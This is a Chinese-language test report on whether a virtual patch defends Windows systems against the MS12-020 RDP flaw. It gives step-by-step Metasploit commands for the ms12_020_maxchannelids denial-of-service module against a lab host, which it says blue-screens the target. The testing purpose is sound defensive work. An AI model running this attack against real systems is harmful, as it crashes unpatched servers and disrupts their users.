1 关 于 MS12-020漏 洞 攻 击 测 试 报 告 测 试 目 的 : 针 对 windows操 作 系 统 的 漏 洞 , 在 为 打 补 丁 之 前 , 利 用 虚 拟 补 丁 对 漏 洞 进 行 防护 的 有 效 性 , 保 护 用 户 使 用 安 全 。 操 作 系 统 ( 版 本 、语言):服务器端: windows server 2008 R2 64位, 客户 端: windows xp 64位。 一、虚 拟 补 丁 功能测 试 过程 漏 洞 编号: MS12-020 测 试 工具: metasploit 测 试 过程: 2 客 户 端 : 1、确定系统没有安装 MS12-020补丁(KB2621440 或 KB2667402) 3 2、启用远程桌面服务 4 5 攻 击 主 机 1、 安 装 攻 击 测 试 工 具 metasploit。 2、 安 装 完 后 , 打 开 metasploit: 开 始 —所有程序—Metasploit中的 Metasploit Console控制台: 3、 控制台打 开 后 , 将出现如下界面 6 4、 攻 击 开 始 (1) 输 入 如 下 命 令 ( 红 色 字 体 为 需 要 输 入 部 分 ) msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf auxiliary(ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 3389 yes The target port msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.51.88 7 RHOST => 192.168.51.88 5、攻击命令输入 msf auxiliary(ms12_020_maxchannelids) > exploit 8 6、 被攻击主机将瞬间蓝屏 备注:请在被攻击主机系统完全启动完毕后,等待一会儿再进行攻击,因为一般 VM启动后,远程桌面需要稍等片刻才会完全启动完毕。 攻击时,如果未出现蓝屏,请重复攻击 1-2次。 攻击成功后,将显示 RPDWD.SYS问题导致蓝屏 9 7、攻击主机显示目标计算机的 RDP协议 Down掉
